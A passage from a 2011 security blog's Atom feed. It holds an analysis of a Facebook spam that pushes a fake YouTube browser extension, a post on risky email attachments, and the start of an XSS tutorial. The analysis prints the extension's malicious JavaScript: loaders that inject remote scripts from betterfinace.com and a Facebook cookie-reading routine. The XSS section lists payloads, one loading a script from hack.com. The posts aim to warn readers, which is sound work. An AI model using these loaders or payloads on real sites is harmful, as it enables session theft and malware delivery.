/&gt;&lt;br /&gt;Once you share this link on your profile, you will be redirected to a link outside the platform. Once the spammer or hacker succeeds you in dragging out of the platform, the real fun begins for him.&lt;br /&gt;So the first thing to notice is the blogspot link which surely does not belong to facebook. The next thing to notice is the error message. This error message is a fake one. Infact the entire flash error generated looks like a error but it is only the use of image and text. The black background that you see is a simple html canvas. The red smily face that you see is an image and the link &quot;install plugin&quot; is a simple hyperlink created with html. Look at the neatness with which spammer has used simple html to look like a missing pluging error.&lt;br /&gt;Now coming to the 3rd thing. Look at the image in the third part and notice the text written on its right hand side. Do you see any relation? A Girl showing somthing(which you might be dieing to see) and the text says &quot;Premium property-B&#39;lore. Obviously the property is premium in the image as well.&lt;br /&gt;Actually the image has got nothing to do with the text. The text is a simple advertisement and the spammer has neatly added a video thumbnail so as to make it appear as the link to this video. Once you click that link, obviously you will not see that premium property which you wanted to and inturn the spammer will make pocket money through add clicks.&lt;br /&gt;There is one more thing to look at. (this one is real fun!). Look at the image.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-tvbk6IJ4M3Y/TuZt3qZ1jbI/AAAAAAAAA94/MBHr0lGY4RE/s1600/spam2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;332&quot; src=&quot;http://1.bp.blogspot.com/-tvbk6IJ4M3Y/TuZt3qZ1jbI/AAAAAAAAA94/MBHr0lGY4RE/s640/spam2.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Just below the addvertisement, you will find the facebook social plugin for adding comments. Well its a fake plugin simply designed by HTML. Even the comments gives you message that in order to view this video you will have to share it first. This is Social Engineering at its best.&lt;br /&gt;&lt;br /&gt;Now moving ahead with the spam. What happens when you click the link &quot; install plugin&quot; ?&lt;br /&gt;&lt;br /&gt;The first thing that happens is a hidden javascript executes and it verifies your browser type. It checks weather you are using Crome or Firefox so that it can redirect you to respective links to&amp;nbsp;download&amp;nbsp;extensions.&lt;br /&gt;If you are using Crome then you will be redirected to&amp;nbsp;http://betterfinace.com/youtube.crx and if you are using firefox then you will be redirected to&amp;nbsp;http://betterfinace.com/youtube.xpi . crx is the default extension for crome plugins and xpi for firefox.&lt;br /&gt;Here is the javascript which performs this task:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;var is_chrome = navigator.userAgent.toLowerCase().indexOf(&#39;chrome&#39;) &amp;gt; -1;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;var is_firefox = navigator.userAgent.toLowerCase().indexOf(&#39;firefox&#39;) &amp;gt; -1;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;function instalar(){&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;if (is_chrome){&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;window.open(&quot;http://betterfinace.com/youtube.crx&quot;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;else if(is_firefox){&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;var params = {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&quot;Youtube Extension&quot;: {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;URL: &quot;http://betterfinace.com/youtube.xpi&quot;,&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;toString: function () { return this.URL; }&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;};&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;the download for the plugin will start after finding your browser type. here I am using firefox as an example.&lt;br /&gt;Firefox will prompt you for download along with a warning that it is an untrusted plugin.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-4Ixl3OnsRBM/TuZv0779gaI/AAAAAAAAA-A/-i9lko8FFsw/s1600/spam3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;180&quot; src=&quot;http://1.bp.blogspot.com/-4Ixl3OnsRBM/TuZv0779gaI/AAAAAAAAA-A/-i9lko8FFsw/s320/spam3.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;But how can we let go premium youtube plugin. So we will install it. Now in order to check what this plugin is actually ment for, we will have to decode the .xpi extension. If you open the .xpi extension then you will find lots of PK and JSPK texts which means that it is simply a compressed file. So rename it to .zip or .rar and then decompress it to view the content of the file.&lt;br /&gt;I found the follwing javascripts in the file.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-8skbEHP9BD4/TuZwmRb7T7I/AAAAAAAAA-I/Aq2S0BbTLgM/s1600/spam4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;172&quot; src=&quot;http://4.bp.blogspot.com/-8skbEHP9BD4/TuZwmRb7T7I/AAAAAAAAA-I/Aq2S0BbTLgM/s640/spam4.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Presence of so many javascripts is enough to identify what this plugin is all about. Basically thsese scripts contain a lot of things. This spam has been designed to attack the user in every possible way. It adds malware, steals cookies of facebook from the victim system, adds a JS trojan and what not. let us dig out each of them.&lt;br /&gt;prefman.js and script-compiler.js are required scripts for building firefox plugins. the only script to look for is youtube.js. It contains the hidden secret of this plugin. Give a look at the code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;loadScript_you();&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;function loadScript_you() {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;if (&#39;https:&#39; == document.location.protocol) return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;var s = document.createElement(&#39;script&#39;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;s.setAttribute(&quot;type&quot;,&quot;text/javascript&quot;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;s.setAttribute(&quot;src&quot;, &quot;http://betterfinace.com/script.js&quot;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;var head=document.getElementsByTagName(&quot;head&quot;)[0];&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;if( head==null) return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;head.appendChild(s);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;return true;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;The first thing. If you are browing https protocol then you are safe. It wont allow the creation of the script object to copy the location. On parsing this script, the browser will look for attributes in http;//betterfinance.com/script.js. Now the question is what dows this external script do?&lt;br /&gt;Lets visit the link to analyse the script deeply.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;function addScript() {&lt;br /&gt; var s = document.createElement(&#39;script&#39;);&lt;br /&gt; s.setAttribute(&quot;type&quot;, &quot;text/javascript&quot;);&lt;br /&gt; s.setAttribute(&quot;src&quot;, &quot;http://betterfinace.com/extra.js&quot;);&lt;br /&gt; var a = document.getElementsByTagName(&#39;script&#39;)[0];&lt;br /&gt; if (a == null) return false;&lt;br /&gt; a.appendChild(s);&lt;br /&gt; return true&lt;br /&gt;}&lt;br /&gt;addScript();&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;You will notice a similar script again. Well the reason for building such links is not clear to me. Maybe there is something I am missing. So this script also contains a link to another external javascript which will be appended in the plugin when browser parses it. Let us see what is hidden in this link.&lt;br /&gt;Well this is the script which holds all the secret. I am still looking at this script deeply. Some of the functions which were easy to catch were ;&lt;br /&gt;&lt;br /&gt;function fb_comparte() : this function is responsible for generating the random fake plugin comments which we saw above.&lt;br /&gt;&lt;br /&gt;function readCookie(a) : got damn! cookie stealer for any link you visit.&lt;br /&gt;&lt;br /&gt;function setCookie(nombre, valor, caducidad) : randomly adds cookies to track your internet activities.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;function FBFBFB321() : Facebook cookie stealer ( not again). Here is the snippet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;function FBFBFB321() {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; var cook = readCookie(&quot;fb_videoazs&quot;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if (cook == &quot;activo&quot;) {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; var user_id = readCookie(&#39;c_user&#39;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if (user_id == null) return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cook = readCookie(&quot;fb_videobzs_&quot; + user_id);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if (cook == &quot;activo&quot;) {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; setTimeout(function () {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; fb_comparte();&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }, 2000);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; return true;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; }&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are some other scripts too but I am too tired now so want to end this post.&lt;br /&gt;Time and again facebook has been hit by such spams. We need to aware of what we do on facebook. Think before you click, before you share.&lt;br /&gt;The spam is still active on the internet so you can go ahead and try out your own research. Facebook spams are a great tool to learn. You really get to know the tricks used by hackers and spammers to make you their pray. Hope you enjoyed my efforts. Time to watch out some premium property ;-) .&lt;br /&gt;Do add your comments and&amp;nbsp;suggestions.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/8416719529555694222/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/it-happens-on-live-television-facebook.html#comment-form' title='24 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8416719529555694222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8416719529555694222'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/it-happens-on-live-television-facebook.html' title='&quot;It Happens on Live television&quot; Facebook spam demystified - A completely new form of Spam'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s72-c/download" height="72" width="72"/><thr:total>24</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-4125872779657469709</id><published>2011-12-12T23:21:00.000+05:30</published><updated>2011-12-12T23:21:42.309+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="email hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>Why Email attachments can be dangerous?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-hWFL7shHTMU/TuY9-3QLxOI/AAAAAAAAA9o/_pe6K2ByLWk/s1600/mail.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;158&quot; src=&quot;http://2.bp.blogspot.com/-hWFL7shHTMU/TuY9-3QLxOI/AAAAAAAAA9o/_pe6K2ByLWk/s200/mail.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Festive season is on. Online e-commerce sites are busy attracting users. Similarly Spammers are also prepared to utilize the season for spreading spam and malwares. Recently I got a mail from Coca Cola(spam ofcorse) which said that I won lots of dollars( it ws so much that I dont remember the exact amount). It had a malicious pdf attachment. Hiding malicious codes inside pdf has become a prime target to bypass email filters. So I thought of writing an article on malicious email attachments.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Why can email attachments be dangerous?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Some of the characteristics that make email attachments convenient and popular are also the ones that make them a common tool for attackers:&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Email is easily circulated - Forwarding email is so simple that viruses can quickly infect many machines. Most viruses don&#39;t even require users to forward the email—they scan a users&#39; computer for email addresses and automatically send the infected message to all of the addresses they find. Attackers take advantage of the reality that most users will automatically trust and open any message that comes from someone they know.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Email programs try to address all users&#39; needs - Almost any type of file can be attached to an email message, so attackers have more freedom with the types of viruses they can send.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Email programs offer many &quot;user-friendly&quot; features - Some email programs have the option to automatically download email attachments, which immediately exposes your computer to any viruses within the attachments.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;b&gt;What steps can you take to protect yourself and others in your address book?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Be wary of unsolicited attachments, even from people you know - Just because an email message looks like it came from your mom, grandma, or boss doesn&#39;t mean that it did. Many viruses can &quot;spoof&quot; the return address, making it look like the message came from someone else. If you can, check with the person who supposedly sent the message to make sure it&#39;s legitimate before opening any attachments. This includes email messages that appear to be from your ISP or software vendor and claim to include patches or anti-virus software. ISPs and software vendors do not send patches or software in email.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Keep software up to date - Install software patches so that attackers can&#39;t take advantage of known problems or vulnerabilities. Many operating systems offer automatic updates. If this option is available, you should enable it.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Trust your instincts - If an email or email attachment seems suspicious, don&#39;t open it, even if your anti-virus software indicates that the message is clean. Attackers are constantly releasing new viruses, and the anti-virus software might not have the signature. At the very least, contact the person who supposedly sent the message to make sure it&#39;s legitimate before you open the attachment. However, especially in the case of forwards, even messages sent by a legitimate sender might contain a virus. If something about the email or the attachment makes you uncomfortable, there may be a good reason. Don&#39;t let your curiosity put your computer at risk.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Save and scan any attachments before opening them - If you have to open an attachment before you can verify the source, take the following steps:&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Be sure the signatures in your anti-virus software are up to date&lt;/div&gt;&lt;div&gt;Save the file to your computer or a disk.&lt;/div&gt;&lt;div&gt;Manually scan the file using your anti-virus software.&lt;/div&gt;&lt;div&gt;If the file is clean and doesn&#39;t seem suspicious, go ahead and open it.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Apart from these there are some of my older posts which can be useful for you:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/04/4-gmail-tips-you-should-know.html&quot; target=&quot;_blank&quot;&gt;4 Gmail tips that you should know&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2010/10/phishing-can-your-browser-protect-you.html&quot; target=&quot;_blank&quot;&gt;Phishing - Can your browser protect you?&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;DARKLORD!!&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/4125872779657469709/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/why-email-attachments-can-be-dangerous.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/4125872779657469709'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/4125872779657469709'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/why-email-attachments-can-be-dangerous.html' title='Why Email attachments can be dangerous?'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-hWFL7shHTMU/TuY9-3QLxOI/AAAAAAAAA9o/_pe6K2ByLWk/s72-c/mail.jpg" height="72" width="72"/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-1828740309089422641</id><published>2011-12-11T23:04:00.000+05:30</published><updated>2011-12-11T23:06:30.704+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="cracking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tool"/><category scheme="http://www.blogger.com/atom/ns#" term="xss attack"/><title type='text'>Cross site scripting(XSS) Cheat Sheet - Readers Choice!!</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-dD65XJCdQog/TuTo65U99YI/AAAAAAAAA9g/GO7X1mRErRM/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-dD65XJCdQog/TuTo65U99YI/AAAAAAAAA9g/GO7X1mRErRM/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello friends. These days I am on an XSS rampage. I recently posted an article on &lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/xss-vulnerability-in-babylon-search.html&quot; target=&quot;_blank&quot;&gt;XSS vulnerability in Babylon search&lt;/a&gt;. Since then I got several request from the readers to post a quick article on cross site scriptting. This tutorial will be divided into two parts. In the first part I will cover the basics of XSS and how the attack vector is implemented. In the next tutorial we will discuss some techniques by which we can prevent XSS attacks.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;OWASP lists &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/basic-sql-injection-tutorial-readers.html&quot; target=&quot;_blank&quot;&gt;sql injection&lt;/a&gt; and XSS as the two most common vulnerabilities in web pages and web apps. We have covered SQL injection quiet extensively so I decided to write on xss.&lt;br /&gt;&lt;br /&gt;Cross Site Scripting or XSS &amp;nbsp;is a web application attack that involves injecting a piece of malicious code into the vulnerable web application/web page. The attacker injects a client side script mainly through the web browser to reach the other users of the particular website. This attack can open several doors for the attacker ranging from session hijacking to entire database compromise.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-IN&quot;&gt;Reflected or Non-persistent XSS attack &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;This is the most common form of XSS attack in which the attackers crafts a malicious code and transfers it to the server side either through the HTTP request parameter or through some HTML form submission. A simple Reflected XSS attack looks like this-&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;script&amp;gt;alert(‘xss’);&amp;lt;/script&amp;gt;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; (Embedded Script)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;script src=http://hack.com/xss.js&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; (External script)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;Consider this real time example of reflected XSS in action:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;a 